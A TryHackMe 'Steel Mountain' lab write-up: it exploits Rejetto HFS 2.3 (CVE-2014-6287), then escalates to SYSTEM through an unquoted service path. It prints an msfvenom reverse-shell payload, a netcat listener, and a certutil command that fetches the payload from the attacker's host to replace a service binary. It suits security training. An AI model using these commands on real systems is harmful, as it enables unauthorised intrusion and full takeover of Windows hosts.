Steel Mountain (THM)

TryHackMeSteel Mountain Write-Up

topics: web application security, powershell, Windows privilege escalation, public exploits, file transferring

  1. Enumeration

  2. Local Privilege Escalation

  3. Exploitation (Root PrivEsc)

new tools: winPEAS, powershell

Enumeration

initial nmap scan .././autonmap.sh $ip Basic

We have several ports open including MSRPC, SMB, RDP, and multiple HTTP ports. Enumerating the low hanging fruit first, the two websites.

The website on port 80 is a default homepage with nothing but an image while port 8080 displays a more interesting page

Clicking the Server Information link reveals this web server is running the Rejetto HTTP File Server 2.3 and because its installed version is 2.3, it is vulnerable to CVE-2014-6287

Local Privilege Escalation

The exploit 39161 explains that we'll need to run an http server with a netcat windows executable to be download. We can essentially upload any file we choose.

Start the server and listener before running the command python exp.py $ip 8080 twice. The first time the command is run we upload the netcat binary while the second time sends a GET request to execute or fetch the binary.

System Privilege Escalation

I did not see anything stand out initially so I decided to run winPEAS. winPEAS returns several potential attack vectors for system privilege but one in particular stands out, an unquoted service path vulnerability.

When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (if service is running with those privileges)

We can cd to the directory C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe and view the proper executable name for our reverse shell.

Create the payload with msfvenom and listen for the shell with nc -nlvp 443

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.18.145 LPORT=443 -f exe -o ASCService.exe

Following this, the service must be stopped, renamed and downloaded from the attacker. and renamed/backed up . Then the payload must be downloaded 

sc stop AdvancedSystemCareService9
certutil.exe -f -urlcache http://10.6.18.145/ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9

and the service started , which returns a shell with nt authority\system privileges

PreviousAttackive Directory (THM)NextBlaster (THM)

Last updated